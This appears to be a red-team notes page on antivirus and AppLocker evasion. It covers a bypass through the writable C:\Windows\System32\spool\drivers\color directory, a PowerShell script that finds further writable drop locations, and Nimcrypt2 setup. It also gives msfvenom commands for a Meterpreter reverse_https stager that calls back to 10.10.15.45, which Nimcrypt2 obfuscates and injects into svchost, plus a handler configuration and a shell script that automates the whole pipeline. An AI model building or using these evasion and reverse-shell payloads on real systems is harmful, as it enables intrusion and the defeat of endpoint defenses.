Anti-Virus Evasion
AppLocker
AppLocker is an application whitelisting technology introduced with Windows 7.
It restricts which programs users can execute based on the program's path, publisher, or file hash.
If AppLocker is configured with only the default rules, we can bypass it by placing our executable in the following directory:
C:\Windows\System32\spool\drivers\color
The default executable rules allow everything under %WINDIR% (C:\Windows), and this directory is writable by standard users, so a binary dropped here runs even though the user's own profile and temp directories are blocked. Before relying on it, check that the directory is still writable on the target and that the effective policy has not added a deny rule for it.
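The two checks a practitioner wants before using this bypass, as an added example that is not part of the original page: enumerate every directory under %WINDIR% that a low-privileged group can write to (the spool\drivers\color path is one instance of this general pattern), then ask the effective AppLocker policy whether an EXE staged there would be allowed, compared against the same file in the user's profile. The variable names, the probe.exe filename and the use of whoami.exe as a stand-in binary are this example's own choices; run it as a standard user on the target, where the AppLocker PowerShell module is available.

```powershell
# Added example (not from the original page or any tool it describes).
# Run as a standard (non-admin) user on the target.

$root      = $env:WINDIR
$writeData = [System.Security.AccessControl.FileSystemRights]::WriteData
$lowPriv   = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

# 1. Directories under C:\Windows whose ACL grants WriteData to a low-privileged
#    group. The default AppLocker path rule covers all of %WINDIR%, so each hit
#    is a candidate drop location, not only spool\drivers\color.
$writable = Get-ChildItem -Path $root -Directory -Recurse -ErrorAction SilentlyContinue |
  ForEach-Object {
    $dir = $_.FullName
    $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
    if (-not $acl) { return }              # access denied on the ACL itself: skip
    $hit = $acl.Access | Where-Object {
      $_.AccessControlType -eq 'Allow' -and
      $lowPriv -contains $_.IdentityReference.Value -and
      (([int]$_.FileSystemRights) -band ([int]$writeData)) -ne 0
    }
    if ($hit) { $dir }
  }
$writable | Sort-Object -Unique

# 2. Ask the effective policy whether an EXE in the color directory is allowed,
#    and compare with the same file placed in the user's temp directory.
#    Test-AppLockerPolicy evaluates a real file, so stage copies of a benign
#    binary (whoami.exe here is an arbitrary choice for the example).
$inColor   = Join-Path "$root\System32\spool\drivers\color" 'probe.exe'
$inProfile = Join-Path $env:TEMP 'probe.exe'
foreach ($p in $inColor, $inProfile) {
  Copy-Item -LiteralPath "$root\System32\whoami.exe" -Destination $p
}
Get-AppLockerPolicy -Effective |
  Test-AppLockerPolicy -Path $inColor, $inProfile -User Everyone |
  Select-Object FilePath, PolicyDecision, MatchingRule
Remove-Item -LiteralPath $inColor, $inProfile
```

With only the default rules the color copy reports Allowed (matched by the %WINDIR% path rule) and the temp copy reports Denied. Because whoami.exe is Microsoft-signed, an Allowed result could also come from a publisher rule if the policy has one; to test the path rule alone, stage an unsigned executable instead. The recursive ACL walk over C:\Windows takes a minute or two.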
Nimcrypt2
Help Menu
Usage:
nimcrypt -f file_to_load -t csharp/raw/pe [-o <output>] [-p <process>] [-n] [-u] [-s] [-e] [-g] [-l] [-v] [--no-ppid-spoof]
nimcrypt (-h | --help)
Options:
-h --help Show this screen.
--version Show version.
-f --file filename File to load
-t --type filetype Type of file (csharp, raw, or pe)
-p --process process Name of process for shellcode injection
-o --output filename Filename for compiled exe
-u --unhook Unhook ntdll.dll
-v --verbose Enable verbose messages during execution
-e --encrypt-strings Encrypt strings using the strenc module
-g --get-syscallstub Use GetSyscallStub instead of NimlineWhispers2
-l --llvm-obfuscator Use Obfuscator-LLVM to compile binary
-n --no-randomization Disable syscall name randomization
-s --no-sandbox Disable sandbox checks
--no-ppid-spoof Disable PPID Spoofing
Installation
git clone https://github.com/icyguider/Nimcrypt2.git /opt/Nimcrypt2
sudo apt install gcc mingw-w64 xz-utils git
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
echo "export PATH=$HOME/.nimble/bin:$PATH" >> ~/.bashrc
export PATH=$HOME/.nimble/bin:$PATH
nimble install winim nimcrypto docopt ptr_math strenc
cd /opt/Nimcrypt2
nim c -d=release --cc:gcc --embedsrc=on --hints=on --app=console --cpu=amd64 --out=nimcrypt nimcrypt.nim
Nimcrypt2 is a fantastic option for obfuscating your binaries; it works with Sliver, Metasploit, and more.
First generate your payload, then wrap it with nimcrypt.
Metasploit with Nimcrypt
Payload generation
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.15.45 LPORT=443 -f exe -o start.exe
No msfvenom encoder is needed here: x86/shikata_ga_nai is an x86-only encoder and does not fit an x64 payload, and Nimcrypt2 encrypts the whole PE anyway.
Now encrypt it with nimcrypt (inject into svchost, encrypt strings, unhook ntdll.dll):
./nimcrypt -f start.exe -t pe -o security.exe -p svchost -e -u
Metasploit Listener Obfuscation
The handler payload must match the one given to msfvenom (reverse_https above); with a reverse_tcp handler the HTTPS stager never connects.
msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.10.15.45
set LPORT 443
set EXITFUNC thread
set AutoLoadStdapi false
set AutoSystemInfo false
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
run -j
Nimcrypt and Shellcode / PE
Generate your shellcode blob as raw bytes (the raw mode expects a .bin of shellcode, not an exe) or take the PE you want to wrap.
Select a process to inject into; the default process is
explorer.exe
If the process is not running, nimcrypt will spawn it and then inject into it.
Shellcode
./nimcrypt -f shellcode.bin -t raw -o filename.exe -p process-name
PE
./nimcrypt -f payload.exe -t pe -o filename.exe
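The Metasploit section and the shellcode/PE section above are one pipeline: build the stager, wrap it with nimcrypt, start a matching handler. The script below is an added example, not code from the page or from Nimcrypt2, that drives all three steps from a single set of variables so the stager and the listener cannot disagree on payload, host or port (the mismatch that silently breaks a callback), and that sanity-checks the nimcrypt output for a PE header. The lab IP, port, svchost target and /opt/Nimcrypt2 path are the page's values taken as assumptions; the function names, stage.exe/stage.bin and handler.rc are this example's own.

```sh
#!/bin/sh
# Added example (not from the page or Nimcrypt2). Usage: ./build.sh pe|raw
set -eu

LHOST="${LHOST:-10.10.15.45}"                    # assumption: lab IP from the page
LPORT="${LPORT:-443}"
PAYLOAD="${PAYLOAD:-windows/x64/meterpreter/reverse_https}"
PROC="${PROC:-svchost}"                          # injection target (nimcrypt -p)
NIMCRYPT="${NIMCRYPT:-/opt/Nimcrypt2/nimcrypt}"  # assumption: install path from the page
OUT="${OUT:-security.exe}"

# Print a msfconsole resource file for the handler, derived from the same
# payload/host/port used to build the stager.
gen_handler_rc() {
  payload="$1"; lhost="$2"; lport="$3"
  cat <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
set EXITFUNC thread
set AutoLoadStdapi false
set AutoSystemInfo false
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
run -j
EOF
}

# Return 0 if the file starts with the "MZ" DOS header, i.e. looks like a PE.
is_pe() {
  [ "$(head -c 2 "$1" 2>/dev/null)" = "MZ" ]
}

# Build the Nimcrypt2 loader. $1 is the nimcrypt input type: "pe" wraps a
# msfvenom-built exe, "raw" wraps a raw shellcode blob.
build() {
  case "$1" in
    pe)
      msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f exe -o stage.exe
      "$NIMCRYPT" -f stage.exe -t pe -o "$OUT" -p "$PROC" -e -u
      ;;
    raw)
      msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f raw -o stage.bin
      "$NIMCRYPT" -f stage.bin -t raw -o "$OUT" -p "$PROC" -e -u
      ;;
    *)
      echo "usage: $0 pe|raw" >&2
      return 2
      ;;
  esac
  # Sanity check: nimcrypt should have emitted a Windows executable.
  is_pe "$OUT" || { echo "$OUT is not a PE file" >&2; return 1; }
  gen_handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > handler.rc
  echo "built $OUT; start the listener with: msfconsole -q -r handler.rc"
}

# Only run the pipeline when a mode is given; sourcing the file just defines
# the functions.
if [ $# -ge 1 ]; then
  build "$1"
fi
```

Override any variable from the environment (for example `PAYLOAD=windows/x64/meterpreter/reverse_tcp ./build.sh raw`) and handler.rc follows automatically; `msfconsole -q -r handler.rc` then starts the listener with the same settings the stager was built with.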